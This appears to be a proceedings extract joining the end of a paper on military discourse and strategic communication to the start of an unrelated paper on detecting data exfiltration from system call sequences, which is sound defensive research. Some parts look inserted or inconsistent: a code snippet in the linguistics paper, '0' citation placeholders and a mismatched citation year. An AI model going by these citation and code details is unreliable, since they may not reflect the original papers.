limited (Rantapelkonen, 2006:72). “Maximizing output” and “minimizing input” (citing Lyotard, 1984 in<br />

Rantapelkonen, 2006:73) match the American ideal of “easy living”. Lyotard argues that technology is<br />

“good” because it is efficient, not because it is “true”, “just” or “beautiful”.<br />

According to Rantapelkonen (2006), 'war on terror' is technologically driven. However, the binary<br />

image of war contains the idea of not only destroying and devastating, but also avoiding risk, threat<br />

and death by liberating, helping and building. Der Derian (2008) calls this "virtuous war". He argues<br />

that the military-industrial complex needs binary rhetoric such as 'bombing for peace' and 'killing to<br />

live' in order to operate and make profit: Technology is in service of virtue. As death and destruction<br />

are no longer accepted, technology steps in. By replacing the soldier with a precision (fire-and-forget)<br />

weapon, 'targets can be hit' and 'operations conducted' without causing protests on the home front.<br />

The evolution of warfare demands that science be in the service of war. Technology “enables us to do a lot<br />
more stuff” and to “more effectively prosecute those operations” (U.S. Department of Defense, 2003).<br />
Because of technology's efficiency and speed, strategies, doctrines and even foreign policy rely on it<br />
alone. The Powell Doctrine aimed to solve problems by overwhelming force in the form of<br />

superior weapons technology. Shock and Awe in 2003 worked much the same way.<br />

However, the modern narratives and threat descriptions do not, after all, change much. President<br />

Obama no longer uses the term "war on terrorism", but this choice of term did not change the warfare<br />

in Afghanistan or Iraq. The US, China, Russia, India, Pakistan, Israel and North Korea are still<br />

developing nuclear weapons. The new threat descriptions have not removed the old threats. Despite<br />

precision munitions, B-52 bombers are still in use. Change takes place first in discourse, and<br />
realization lags behind.<br />

The Grand Military Narrative contains a techno-ideology, which is encoded in language. In this<br />

Narrative war has two aspects: the "how" and "why". How wars are conducted is a matter of<br />

technology descriptions. Why wars are fought is a matter of value systems. The merging of these two<br />
aspects creates what is now known as strategic communication.<br />

3. From information warfare to strategic communication<br />

Not only the language of press briefings but also soldier-to-soldier communication has changed.<br />
On the battlefield and in combat, propaganda has been replaced by strategic and psychological<br />
influence. Global and social media exert an increasing influence, and new technological solutions<br />
create opportunities to make an impact. Strategic communication exploits all of these.<br />

The new generation's war, the Gulf War, was a catalyst for public discussion of the new wave of<br />

Information Operations. The Kosovo War and 9/11 sped up the discussion. A whole new narrative<br />

was created during the 'War Against Terrorism'.<br />

According to Taylor (2003), the concepts of political, psychological or information warfare are<br />

outdated. Instead, we use the concept of 'strategic communication'. Taylor recognizes three types of<br />
it. The first is “public diplomacy”, referring to the state and political level. The second is “public affairs”, which<br />

contains the global media. The third type, Information operations (Info Ops), deals with military<br />

capability. Strategic communication has abandoned the Cold War era categories of propaganda: the<br />

so-called “black” (covert), “white” (overt) and “grey” (source unknown) propaganda. Today, the speed of<br />

communication is enough to disturb our perception management capability. The 24/7 model takes<br />

advantage of our values and understanding of democracy: we say no to censorship and want all<br />

information to be available at all times, everywhere.<br />

Strategic communication is a child of the complex world. Instead of rational knowledge, we have<br />

information flow. Planning and execution are parallel processes; speed dictates the operational<br />

modes, and strategic communication is an attempt to control all this.<br />

4. The question of responsibility: Effects Based Operations<br />

Effects Based Operations (EBO) is a US military concept and doctrine that stands for "operations that<br />

are planned, executed, assessed, and adapted based on a holistic understanding of the operational<br />

environment in order to influence or change system behaviour or capabilities using the integrated<br />


application of select instruments of power to achieve directed policy aims". On the day of "Shock and<br />

Awe" in 2003, Colonel Gary L. Crowder, chief of strategy, concepts and doctrine, elaborated the<br />

concept in layperson's terms in a press briefing dedicated to EBO alone (U.S. Department of<br />
Defense, 2003). Before the explanation proceeds any further, the concepts of a technology-based<br />
approach and doctrine step in. Crowder explains that the new approach was "more than just people, it<br />

was the combination of a fortuitous development of different capabilities and technologies [...] that<br />

enabled us to do that." The phrases that follow this capture the very essence of the discourse that<br />

characterized American public relations at the beginning of the war:<br />

[...] what we wanted to do was in fact to achieve some sort of policy objective, and that<br />

you could, in fact, craft military operations to better achieve those policy operations in a<br />

more efficient and effective manner.<br />

The key words here are "efficient" and "effective". EBO was, according to Crowder, a way to mitigate<br />

collateral damage. In order to explain the concepts of "collateral damage" and "unintended damage",<br />

Crowder had to discuss risk-taking as part of doctrine.<br />

Crowder explains that even if collateral and unintended damage happen, and "both of these types of<br />

damage will take place", they "still went through a methodical process". This precisely is the problem<br />

with strategy that relies almost solely on the performance of technology. Technology fails, and when it<br />

does, the responsibility for that failure is laid on technology itself. According to the strategy, both<br />
collateral and unintended damage are unavoidable, technology has its failure ratio, and these are facts<br />
that just have to be accepted. In Virilio's (1989: 8-9) terms, the Art of War has turned into the Science of the<br />
Accident.<br />

Technology is complex and when techno-speak enters press-briefings such as Crowder's, a new kind<br />

of language is created. Zizek (2009) argues that public communication increasingly applies expert<br />

and scientific jargon that no longer translates into the 'common speak' of society. The 'expert<br />

speak', despite its abstract nature, still shapes our thinking, especially when it is labeled with<br />

adjectives such as 'precision', 'smart' and 'efficiency'. With examples of virtuous warring (liberating)<br />

and precise and efficient operating models (avoiding collateral damage), it complies with the modern<br />

imperative of clean and safe, effective and lethal, and yet moral and humane war fighting. The kind of<br />

war that we will accept.<br />

Although EBO as it was first created and intended has already been abandoned by the U.S. Department<br />
of Defense, it created a new narrative tradition of virtue, the superiority of technology and binary<br />

values. This tradition continues to influence Western military discourses. This will be discussed in<br />

Section 5.<br />

5. The grand military narrative: Analysis<br />

In order to pinpoint the Grand Military Narrative of strategic communication, we have to look at the<br />

theme and structures of the strategists' language. The United States has an undisputed position as the<br />

military trend-setter and the creator of new military concepts. This makes American strategy papers<br />

and press briefings on strategy and doctrine a good resource for analyzing the evolution of strategic<br />

communication. The upcoming sections continue the discussion on strategy, doctrine and Effects<br />

Based Operations and their influence on discourse.<br />

The Joint Operating Environment 2010 (JOE10) (United States Joint Forces Command, 2010)<br />

provides the framework for our analysis and aims to forecast the future of American<br />

warfare. It argues and elaborates on what should be prepared for. The narrative starts from the<br />

recognition of the human limitations in the complex world, created by the clash of different ideologies<br />

and cultures, and further supplemented by advances in technology and changes in the economy.<br />

The complex world affects, according to the report, the "battle of narratives". If winning the battle is<br />

important, winning the battle of narratives is "absolutely crucial". The report concludes that<br />

Dominating the narrative of any operation, whether military or otherwise, pays enormous<br />

dividends. [...] In the battle of narratives, the United States must not ignore its ability to<br />

bring its considerable soft power to bear in order to reinforce the positive aspects of Joint<br />

Force operations. Humanitarian assistance, reconstruction, securing the safety of local<br />


populations, military-to-military exercises, health care, and disaster relief are just a few<br />

examples of the positive measures that we offer.<br />

This statement is interesting, as we have witnessed the emergence of operations 'other than war'. In<br />

the narrative of Operation Iraqi Freedom, the military leadership put much focus on the humanitarian<br />

aspect of the operation. But the "battle of narratives" manifested itself not only in word choices such<br />
as 'liberate' and 'humanitarian aid', but also in terms such as 'precision-guided weapons'. The emphasis<br />
on the use of precision-guided munitions can be seen as a semantic tactic. Technology is part of the<br />

narrative.<br />

JOE10 mentions the words deter and deterrence several times, and finally concludes that deterrence<br />

will be the "primary purpose" of the military forces. This explains the threat discourse: the only way to<br />

deter is to excel over the rest in skill, capacity and resources. Deterrence will be created by absorbing<br />

education and science: "The Services should draw from a breadth and depth of education in a range<br />

of relevant disciplines to include history, anthropology, economics, geopolitics, cultural studies, the<br />

‘hard’ sciences, law, and strategic communication", the report states. It also stresses that in future,<br />

asymmetric and irregular warfare will be more likely than conventional warfare, and that the U.S.<br />

military should be prepared for this:<br />

Irregular wars are more likely, and winning such conflicts will prove just as important to<br />

the protection of America’s vital interests and the maintenance of global stability.<br />

To summarize the report, we make the following conclusions: In strategy, techno-speak<br />

1. is part of the "battle of narratives"<br />

2. is based on threat discourse<br />

3. serves the function of deterrence<br />

These conclusions serve as the starting point for the linguistic part of the analysis.<br />

5.1 Narrating the doctrine: Effects Based Operations briefing<br />

This briefing aired on the same day that coalition forces started Operation Iraqi Freedom by<br />

bombing Baghdad. In this briefing, Colonel Gary Crowder (the division chief at Air Combat Command<br />

and the plans director for Strategy, Concepts and Doctrine) introduces the concept of Effects Based<br />

Operations (EBO) to the public. The role and type of technology descriptions in it will be discussed in<br />

this section.<br />

Two types of clauses are included in the analysis: those where the 'doer' is technology, and those<br />
where the 'doer' is 'us' (the US, the Coalition Forces, etc.).<br />

When looking at the clauses where technology is the Actor, the main observations are that in these<br />

descriptions the typical process is a description of 'enabling', and the object of action (Goal or Range,<br />

often in a projected clause) is abstract or ambiguous:<br />

Table 1: Technology as a doer<br />
# | ACTOR | PROCESS (material) | BENEFICIARY<br />
1 | these analytical tools | enable | us [...] to find alternative methodologies<br />
2 | [PGM] [...] | give | us the ability for a large number of other aircraft besides just stealth aircraft to hit multiple weapons per targets.<br />
3 | its stealth qualities | enable | us to do a large number of things<br />
4 | [the stealth] | enables | us to do a lot more stuff<br />
5 | the stealth | does give | us some capabilities in addition to the precision<br />

In action descriptions where the Actor is human or animate, there are two main types. The first type<br />
consists of descriptions of dynamic military action and capability:<br />



Table 2: Human as a doer<br />
# | ACTOR/CARRIER | PROCESS (material or relational) | GOAL/RANGE/POSSESSED<br />
6 | we | were able to take down | the air defense system<br />
7 | we | were able to neutralize | those towers<br />
8 | we | can hit | multiple targets<br />
9 | we | have | much more dual-use capability in each of the Air Force's, Navy's and Marines' fighter aircraft as well as our bomber aircraft<br />
10 | we | have | an improved ability to go after adversary's systems<br />

The action descriptions refer to the use of weapons and technology. In descriptions of military action,<br />

the process is typically material (physical) and the object of the action is inanimate and often abstract.<br />

The data also contains a number of possessive attributive action descriptions (having something),<br />

where the entity possessed is typically capability or ability, both abstract. The evaluation of the first<br />

ten sample clauses is positive. The Process (often combined with the Goal/Range) signals social<br />

esteem in the form of capacity; Technology and Self are described as competent, expert and<br />

powerful. The objects of action are inanimate, which signals Social Sanction: the one acting is good,<br />

moral and ethical by attacking non-human targets.<br />

The second type consists of action descriptions that are somewhere between material and mental<br />

processes:<br />

Table 3: Human as a doer<br />
# | SENSER | PROCESS (mental) | PHENOMENON<br />
11 | I | would prioritize | [...] those targets<br />
12 | we | look at | the desired effects we want to create on the battlespace<br />
13 | we | evaluate | the target sets that we need to do, that -- those effects that we need to create on the battlespace<br />
14 | we | bring | those together into a integrated plan<br />
15 | we | literally come up with | a high heaven objective<br />

These descriptions highlight the analytical part of waging war: the planning and creation of<br />

strategy. In this context we will analyze them as mental processes, because they contrast strongly<br />
with the material processes of attacking and neutralizing, and their purpose is to emphasize<br />

the role of the scientific and creative planning process in warfare. The evaluation in the above clauses<br />

is, just like in the first ten, positive. Capacity is signaled with descriptions of observation, consideration<br />

and learnedness. These Process types can further be characterized as perceptive and cognitive<br />

(Halliday, 2004: 210).<br />
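The clause classification used in Tables 1–3 amounts to simple bookkeeping over annotated clauses. The following sketch is only an illustration of that bookkeeping, not the authors' tooling; the clause records and labels are assumptions reconstructed from the tables:

```python
from collections import Counter

# Hypothetical clause annotations following the categories of Tables 1-3:
# each clause records its 'doer' and its Hallidayan process type.
clauses = [
    {"doer": "technology", "process": "material",
     "text": "these analytical tools enable us ..."},
    {"doer": "human", "process": "material",
     "text": "we were able to take down the air defense system"},
    {"doer": "human", "process": "mental",
     "text": "we evaluate the target sets ..."},
]

# Cross-tabulate doer against process type, as the tables do.
tally = Counter((c["doer"], c["process"]) for c in clauses)
for (doer, process), count in sorted(tally.items()):
    print(f"{doer:<10} {process:<8} {count}")
```

Counting doer/process pairs in this way makes the distribution of Capacity descriptions across Technology and Self directly comparable.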

To put it briefly, the source text emphasizes Capacity that is realized by descriptions of having both<br />

inner (ability, cognitive skills) and outer (material, technological) resources. Of all action, the emphasis<br />

is on inner experience: Weapons are of course used, but after a planning process that is described as<br />

highly scientific. In addition to action descriptions, the briefing contained a number of nominal<br />

constructions that are worth noting:<br />

Table 4: Nominalizations<br />

Nominal constructions: technology<br />

the combination of a fortuitous development of different capabilities and technologies<br />

the development of the laser-guided bombs<br />

the capability of a Joint Direct Attack Munition<br />

the evolution of about the last 20 years<br />

the evolution of both the Air Force and the Navy and Marine Corps' combat<br />

our ability to go after targets<br />


The above nominalizations capture the semantic content of the action descriptions: development,<br />

capability, evolution, ability. The order of these nominalizations creates a narrative of evolving and<br />

developing capability that finally is utilized as an ability. This narrative creates a concept of<br />

advancement and technological omnipotence.<br />

5.2 Discussion<br />

There are two major players in the Grand Narrative of War: Technology is the enabler, and 'we' are<br />

the able. The ability technology creates is to wage war effectively, precisely and securely and so save<br />

lives by avoiding casualties and collateral damage. Technology is the prerequisite for humanity in<br />

warfare. In this narrative, war has evolved into "Effects Based Operations" on one hand, and into<br />

humanitarian operations on the other. The result is war's new image, which is slowly drifting further<br />

and further away from the killing, and closer and closer to implementing humanity. This is the source<br />

of the binary rhetoric of 'bombing for peace' and 'destroying the village to save it'.<br />

The frequently occurring words capacity and capability are abstract umbrella terms that may refer to<br />
anything from the financial or human resources to operate to the quality of weapons<br />
systems, planning, or the mass of the actual weapons. These are everyday terms in strategy and<br />

operations discussed in public and allow the speaker to carry out the tactic of neutrality through<br />

vagueness.<br />

The technology descriptions in American war-speak serve the function of deterrence. As the Joint<br />
Operating Environment 2010 (United States Joint Forces Command, 2010) concludes, the task of<br />

deterrence will be increasingly important. This, however, raises the question of whether the asymmetric<br />
and irregular enemy the report describes can be deterred and, if so, whether technology as a<br />
deterrent will work. Insurgents use inexpensive and asymmetric forms of combat, to which the U.S.<br />
responds with expensive countermeasures. According to the 2008 National Defense Strategy,<br />
deterrence must include both military and non-military tools, and "changes in capabilities,<br />
especially new technologies" help to create a credible deterrent. Metz (2007: 65) elaborates on the<br />

logic of fighting insurgency with technology:<br />

Counterinsurgency experts long have argued that technology is unimportant in this type<br />

of conflict. While it is certainly correct that technology designed to find and destroy a<br />

conventional enemy military force had limited application, other types such as nonlethal<br />

weapons and robotics do hold promise for difficult tasks such as securing populated<br />

areas, preventing infiltration, and avoiding civilian casualties.<br />

While the counterinsurgency (COIN) strategy emphasizes the integration of military and non-military<br />

means, the military still turns to technology for answers. EBO, once justified with the promise of new<br />

technologies, has been abandoned and replaced with a 'Comprehensive Approach'. These new<br />
(or, if not new, then updated) strategies are justified with 'even less' collateral damage and 'even<br />
better' precision - enabled by technology. The names of the applied strategies change, but the<br />

discourse (and the weapons used) remains the same. The deterrence the West imposes means<br />

smaller and smaller missiles (yet more lethal than ever), satellites and stealth drones (that both<br />

observe us and guide missiles) and cyberspace. Virilio (2009) calls this "aesthetics of disappearance".<br />

The collective Western outlook no longer tolerates alternatives that would make war visible. At the<br />

same time, we fear the unseen.<br />

The Joint Operating Environment 2010 (ibid.) also remarks that individual soldiers are increasingly<br />

"global communication producers". According to the report, in the "battle of narratives" the role of the<br />

"strategic corporal whose acts might have strategic consequences if widely reported" is significant. By<br />
press-briefing the media and embedding journalists in 'liberation operations', the military leadership is<br />

creating strategic communication that is convincing enough to appeal not only to the public, but also<br />

to the soldier, who has to be supervised and controlled by the system and as part of the system - not<br />

as an individual. In the words of the COIN Field Manual: "Information operations (IO) must be<br />

aggressively employed" to "obtain local, regional, and international support for COIN operations" and<br />

"discredit insurgent propaganda and provide a more compelling alternative to the insurgent ideology<br />

and narrative".<br />



6. Conclusion<br />


The Revolution in Military Affairs presents the new identity of war as a system of technologies, an<br />

ideology which manifests itself in military discourse. In addition, systems thinking, such as EBO, has<br />

created the demand for both internal and external control in the Western military force. This<br />

combination of strategically significant military contractors, techno-faith and the need to dominate and<br />

control has led to strategic communication, which contains the Grand Military Narrative. According to<br />

this Grand Narrative, technology executes, with precision, reliability and from a distance, the duties<br />

determined by analytical, rational and morally virtuous humans. The public role of the military is to 'do<br />

good'. In this narrative, war is removed from the battlefields into the virtual.<br />

The binary roles of the military result in binary rhetoric, and this is very visible in the analysis<br />

introduced in this article. Whereas the adversary, the insurgents, conduct hands-on warfare based on<br />

the assumption that the insurgent will die in the process, the West distances itself from the discomfort<br />

both physically (drones and missiles) and mentally (distance and simulation) and tolerate no losses.<br />

'We' cling onto everything we have, whereas 'they' have little to lose. 'We' fight the enemy with the<br />

exact opposite way than they fight 'us': The US is portrayed as evolved and scientific, while the<br />

majority of the militaries in the rest of the world employ very different methods of warfare. This makes<br />

the discourse on the threats of asymmetric enemies interesting. Is it not the RMA that distanced 'us'<br />

from the enemy and created asymmetry, the Frankenstein we are now terrified of?<br />

The Grand Military Narrative is full of paradoxes. Rhetoric, strategy and reality do not meet. The result<br />

is that we are deterring an asymmetric enemy (that cannot be deterred) with weapons (that cannot be<br />

seen) and pay more than we can afford to in order to do so (while the enemy pays close to nothing).<br />

The paradox here is that in an arms race against asymmetric enemies, the winner is not the one who<br />

has the most advanced technology, but the one who can tolerate the greatest losses.<br />

References<br />

Allen, Patrick D. (2010) Information Operations Planning, Boston: Artech House.<br />

Boisot, M. H., MacMillan, I. C. and Han, K. (2007) Explorations in Information Space. Knowledge, Agents, and<br />

Organisation, London: Oxford University Press.<br />

Campen, A. (1996) Cyberwar, Washington D.C.: AFCEA Press.<br />

Campen, A. (1992) The First Information Warfare: The Story of Computers and Intelligence Systems in the<br />

Persian Gulf War, Washington D.C.: AFCEA International Press.<br />

Czosseck, C. and Geers, K. (Eds.) (2009) The Virtual Battlefield: Perspectives on Cyber Warfare, Amsterdam:<br />

IOS Press.<br />

David, G. J. and McKeldin III, T.R. (Eds.) (2009) Ideas as Weapons. Influence Perception in Modern Warfare,<br />

Washington D.C.: Potomac Books.<br />

Der Derian, J. (2009) Virtuous War, New York: Routledge.<br />

Fainaru, S. and Klein, A. (2007) 'In Iraq, a Private Realm Of Intelligence-Gathering', Washington Post, 1 July,<br />

[Online], Available: http://www.washingtonpost.com [19 Oct 2010].<br />

Halliday, M.A.K. (2004) An Introduction to Functional Grammar. Revised by Matthiessen, C.M.I.M., London:<br />

Arnold.<br />

Johnston, W. (2010) 'War Games Lure Recruits For 'Real Thing'', NPR, 31 July, [Online],<br />

Available:http://www.npr.org/templates/story/story.php?storyId=128875936 [19 Oct 2010].<br />

Krishnan, A. (2009) Killer Robots. Legality and Ethicality of Autonomous Weapons, Burlington: Ashgate.<br />

Libicki, M. (1996) What is Information Warfare? Washington DC: National Defence University Press.<br />

Matthews, W. (2010) 'Smaller, Lighter, Cheaper: New Missiles Are 'Absolutely Ideal' for Irregular Warfare',<br />

Defense News, 31 May, [Online], Available: http://www.defensenews.com/story.php?i=4649372 [19 Oct<br />

2010]<br />

Metz, S. (2007) Learning from Iraq: Counterinsurgency in American strategy, [Online], Available:<br />

http://www.strategicstudiesinstitute.army.mil/pubs/download.cfm?q=752 [19 Oct 2010].<br />

Rantapelkonen, J. (2006) The Narrative Leadership of War: Presidential Phrases in the 'War on Terror' and their<br />

Relation to Information Technology. Doctoral Dissertation. Publication Series 1, Research n:o 34, Helsinki:<br />

National Defence University.<br />

Risen, J. & Mazzetti, M. (2009) 'C.I.A. Said to Use Outsiders to Put Bombs on Drones', New York Times, 20 Aug,<br />

[Online], Available: http://www.nytimes.com/2009/08/21/us/21intel.html [19 Oct 2010].<br />

Stahl, R. (2010) Militainment, INC. War, Media, and Popular Culture, New York: Routledge.<br />

Shimko, K. L. (2010) The Iraq Wars and America’s Military Revolution, New York: Cambridge University Press.<br />

Soeters, J., van Fenema P.C., & Beeres, R. (Eds.) (2010) Managing Military Organizations: Theory and practice,<br />

London: Routledge.<br />

Taylor, P. (2003) Munitions of the Mind: A History of Propaganda from the Ancient World to the Present Day, 3rd<br />

edition, Manchester: Manchester University Press.<br />


Thearmyexperience (2008) Inside the Army Experience Center, [video online]<br />

Available:http://www.youtube.com/watch?v=-lZKV9bP_0Q [19 Oct 2010]<br />

Toffler, A. (1981) The Third Wave, New York: Bantam Books.<br />

Toffler, A . & Toffler, H. (1993) War and Anti-War: Survival at the Dawn of the 21st Century, Boston: Little, Brown<br />

& Co.<br />

United States Joint Forces Command. (2010) The Joint Operating Environment 2010 [Online], Available:<br />

http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf [19 Oct 2010].<br />

U.S. Department of Defense (2008) 2008 National Defense Strategy, [Online], Available:<br />

http://www.defense.gov/news/2008%20national%20defense%20strategy.pdf [19 Oct 2010]<br />

U.S. Department of Defense (2003) Effects Based Operations Briefing. Transcript, 19 March, [Online], Available:<br />

http://www.defense.gov/Transcripts/Transcript.aspx?TranscriptID=2067 [19 Oct 2010]<br />

Wichner, D. (2010) 'Raytheon's new Griffin fit for drone', Arizona Daily Star, 22 Aug, [Online] Available:<br />

http://azstarnet.com/business/local/article_ff437ef6-c69d-56c6-aeff-e74d0d5902b9.html [19 Oct 2010]<br />

Ventre, D. (2007) Information Warfare, London: Wiley.<br />

Virilio, P. (2009) The Aesthetics of Disappearance, Translated by Philip Beitchman, Los Angeles: Semiotext(e).<br />

Virilio, P. (1989) War and Cinema. The Logistics of Perception, Translated by Patrick Camiller, London: Verso.<br />

Wiest, A. (2006) Rolling Thunder in a Gentle Land – The Vietnam War Revisited, London: Osprey Publishing.<br />

Zizek, S. (2009) Pehmeä vallankumous, Translated by Janne Porttikivi, Helsinki: Gaudeamus.<br />

Unpublished<br />

XX. (2010) “On Making War Possible: Strategic Thinking, Soldiers’ Identity, and Military Grand Narrative”.<br />

(Unpublished manuscript in Security Dialogue)<br />



Host-Based Data Exfiltration Detection via System Call<br />

Sequences<br />

Brian Jewell 1 and Justin Beaver 2<br />

1 Tennessee Technological University, Cookeville, USA<br />
2 Oak Ridge National Laboratory, Oak Ridge, USA<br />

bcjewell21@tntech.edu<br />

beaverjm@ornl.gov<br />

Abstract: The host-based detection of malicious data exfiltration activities is currently a sparse area of research<br />

and mostly limited to methods that analyze network traffic or signature-based detection methods that target<br />
specific processes. In this paper we explore an alternative method of host-based detection that exploits<br />

sequences of system calls and new collection methods that allow us to catch these activities in real time. We<br />

show that system call sequences can be found to reach a steady state across processes and users, and explore<br />

the viability of new methods as heuristics for profiling user behaviors.<br />

Keywords: data exfiltration, data security, intrusion detection<br />

1. Introduction<br />

A successful attack on an organization involving the theft of sensitive data can be devastating. Data<br />

exfiltration is the term used to describe this type of theft and can be defined as the unauthorized<br />

transfer of information from a computer system. Data exfiltration attacks represent a tremendous<br />

threat to both government entities and commercial enterprises.<br />

Government organizations maintain repositories for sensitive and classified information, and breaches<br />

into protected systems or leaks into the public domain can have implications that threaten national<br />

security. Commercial enterprises manage complex levels of proprietary tools and data that, if<br />

compromised, could endanger the financial security of their institutions and/or their customers. Recent<br />

studies find that information leaks are the most prevalent security threat for organizations, and that in<br />

recent years attackers have exfiltrated more than 20 terabytes of data, much of which is sensitive,<br />

from the U.S. Department of Defense and Defense Industrial Base organizations, as well as civilian<br />

government organizations 0.<br />

Despite the threat, the approach to defending against these attacks is surprisingly unsophisticated.<br />

Off-the-shelf intrusion detection systems (IDS) monitor for known malicious network signatures at the<br />

system boundary. These systems are relied upon to flag potential network breaches, which are then<br />

typically investigated manually (often these are guided analyses that leverage custom-built scripts) in<br />

order to trace potential unauthorized activities. Unfortunately, the model of perimeter defense leaves<br />

attackers free to navigate, investigate, and extrude information if the perimeter is breached<br />

undetected.<br />

Host intrusion detection systems (HIDS) are software programs that run on each computer host in a<br />

network and attempt to detect malicious events in the operation of the host. Commercial virus<br />

protection packages (McAfee, 2003) are examples of HIDS and monitor system services, registry<br />

changes, and check individual files for signatures of known malicious programs. We approach the<br />

detection of data exfiltration attacks as a HIDS. Once the boundary defense is breached, it is from the<br />

individual hosts that a malicious user will explore file systems, package data, and export it to an<br />

outside network. We postulate that, given insight into the activities of individual users and processes<br />

on a given host, acts of unauthorized data exfiltration can be discriminated from normal user/process<br />

behaviors.<br />

Our hypothesis hinges on the availability of low-level data that reflects the operation of processes on<br />

a computer host. We propose to achieve this insight into the computer’s operation through the<br />

monitoring of system calls, which are low-level process interactions with the host computer’s<br />

operating system. System calls provide a window into what all processes and users on a host<br />

machine are executing, regardless of how they are interacting with the machine. In addition, they<br />

provide more fidelity in identifying individual actions than a process monitor.<br />

In this paper, we propose the use of a method by which unique sequences of system calls, managed<br />

at the process/user level, are the basis for discriminating normal and anomalous behaviors by users<br />

for use as an exfiltration detection agent. We then evaluate this model against our three criteria for a viable<br />

detection agent.<br />

Tractable: the chosen method must be able to run in real time while having a negligible effect on the<br />

system as experienced by the end user.<br />

Environmentally Neutral: our method must also be portable and adapt to any environment.<br />

Responsive: lastly, our ideal method should reliably report on data exfiltration behaviors.<br />

The remainder of this paper is organized as follows: Section 2 provides a review of similar work. Section 3<br />

formalizes the methodology we used to categorize normal behavior and collect a profile from the<br />

system call data traces. Section 4 evaluates our method according to the 3 criteria we set, and<br />

Section 5 gives a detailed account of our results, conclusions, and ideas for future work.<br />

2. Related work<br />

The detection of data exfiltrations has been a recent focus of cyber security research. Exfiltration<br />

detection is a difficult problem due to the wide range of methods available, and the subtlety with which<br />

it can be performed 0. Current IDS systems are mostly concerned with intrusion attempts, although<br />

there are commercially available extrusion detection systems (e.g., Fidelis Security Systems, 2009). Like network-based<br />

IDSs, these are primarily signature-based solutions that perform network traffic analysis through<br />

custom hardware.<br />

Many more advanced data analysis approaches have been proposed, including clustering of network<br />

traffic for anomaly detection 0, the application of statistical and signal processing methods to<br />

outbound traffic for signature identification 0, and the application of data mining techniques 0 to<br />

network data. These approaches yielded varying degrees of success, but inevitably were plagued<br />

with base-rate fallacy issues (Axelsson, 2000) or a narrow problem focus.<br />

However, when we look at previous work on host-based IDSs there is some inspiration for host-based<br />

data exfiltration detection. In 1996, Forrest, et al, proposed a host-based intrusion detection method<br />

based on the monitoring of system calls (Forrest, 1996). This early work was inspired by the human<br />

immune system's ability to recognize which cells are part of the host organism (self) and which are foreign (non-self).<br />

They used this principle in developing their own methodology for constructing a "sense of self"<br />

for Unix based systems using available system trace data.<br />

Forrest’s methodology used lookahead pairs, or sets containing pairs of system calls formed by the<br />

originating system call and the one that follows it at distances 1, 2, 3, ..., k. These pairs were used to<br />

form a database of normal process behavior (or self), which was then used to monitor for previously unseen<br />

patterns, which were tagged as anomalous (or non-self). While their results were only preliminary,<br />

they did show that a stable signature of normal process behavior could be constructed using very<br />

simple methods.<br />
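As a concrete illustration, Forrest-style lookahead pairs can be built in a few lines. The sketch below<br />
is hedged: the function and variable names are ours, not from the original work.<br />

```python
def lookahead_pairs(trace, k):
    """Record, for each call, the calls that follow it at
    distances 1..k (Forrest-style lookahead pairs)."""
    pairs = set()
    for i, call in enumerate(trace):
        for d in range(1, k + 1):
            if i + d < len(trace):
                pairs.add((call, d, trace[i + d]))
    return pairs

def count_anomalous(trace, normal_db, k):
    """Pairs in a new trace that never appeared in training
    are tagged as anomalous (non-self)."""
    return len(lookahead_pairs(trace, k) - normal_db)

# Build a toy "self" database from a training trace, then score a
# trace containing an unseen call.
normal = lookahead_pairs(["open", "read", "write", "close"], k=3)
score = count_anomalous(["open", "read", "mmap", "close"], normal, k=3)
```

Here `score` is nonzero because `mmap` never occurred in training; a production detector would<br />
normalize such counts by trace length before raising an alarm.<br />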

Many other approaches have been taken since to model the behavior of processes using system<br />

calls, including the use of Hidden Markov Models (HMM) (Gao, 2006), neural networks (Endler, 1998),<br />

k-nearest neighbors (Liao, 2002), and Bayes models (Kosoresow, 1997). These models were all<br />

developed in hopes of producing more accurate models while reducing false positives, but this comes at<br />

a high computational cost. The most notable advantage of Forrest's model is the ability to track<br />

processes for anomalous behavior at the application layer of each individual host in real time at a very<br />

low computational cost.<br />

Forrest et al. later improved upon their work in (Forrest, 2008) by introducing another simple model<br />

that is suitable for real-time detection dubbed sequence time-delay embedding (stide), and again<br />

involves the enumeration of system call sequences. However, this time their method uses contiguous<br />

sequences of fixed length to form a database of normal behavior. They also introduce a new<br />

modification to their method called sequence time-delay embedding with frequency threshold (t-stide).<br />

This method explores the hypothesis that sequences with very low occurrence rates in training data<br />

are suspicious.<br />

Forrest et al. tested these methods against two popular machine learning approaches: one based on<br />

RIPPER, a rule learning system developed by William Cohen (Cohen, 1995) that was later adapted<br />

by Lee et al. (Lee, 1998) to learn rules that predict system calls and flag anomalies, and the other<br />

based on HMMs as used in (Gao, 2006). While they were not able to show that stide performed better<br />

than the other methods, they did conclude that it performed comparably to more complicated<br />

methods.<br />

Our work is most closely paralleled by that of Forrest and leverages host-based system call<br />

information to detect anomalous user behaviors. Unlike previous work, we seek to implement and<br />

adapt this approach as an analysis process that is user and process centric to detect data exfiltration<br />

agents.<br />

3. Methodology<br />

Our model for data exfiltration detection focuses on the analysis of system calls used in a host’s<br />

operation and hinges on observations similar to that found in previous works by Forrest et al. (Forrest,<br />

2008). This section justifies the use of sequences of system calls as a mechanism for defining normal<br />

behaviors in Section 3.1, discusses variants in optimizing system call sequences in Section 3.2, and<br />

compares these variants for use as data exfiltration detectors in Section 3.3.<br />

3.1 Defining normal in sequences of system calls<br />

A system call trace or system call sequence is the ordered list of system calls as invoked by a process<br />

that spans the length of execution by a given user. An example system call trace for a given user<br />

might be:<br />

“..., open, read, fstat, fstat, write, close, mmap,...”,<br />

where “open”, “read”, “fstat”, etc. are all examples of system call names. All invoked user<br />

operations, whether a command line imperative or in the operation of a running program, use various<br />

combinations of system calls to complete their tasking. Even simple commands, such as a directory<br />

listing, use a sequence of multiple system calls to execute.<br />

While there are a number of current methods to enumerate system call sequences, there is a<br />

common theme: to form a data store of traces that are used to characterize normal behaviors (also<br />

referred to as a normal profile) in a given environment. Once the data store is established, it can be<br />

used as the basis for identifying future sequences as normal (within the set) or anomalous (not<br />

included in the set). In addition, it is desirable for any automated comparison of this profile with<br />

experienced events to be computationally tractable.<br />
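In code, such a data store reduces to simple set membership; a minimal sketch (the class and<br />
method names are our own, not from a specific prior implementation):<br />

```python
class NormalProfile:
    """Data store of system call sequences observed during training.
    Membership lookup is O(1), keeping run-time comparison tractable."""

    def __init__(self):
        self.known = set()

    def train(self, sequences):
        """Add training sequences to the normal profile."""
        self.known.update(tuple(s) for s in sequences)

    def is_normal(self, sequence):
        """A sequence is 'normal' iff it was seen in training."""
        return tuple(sequence) in self.known

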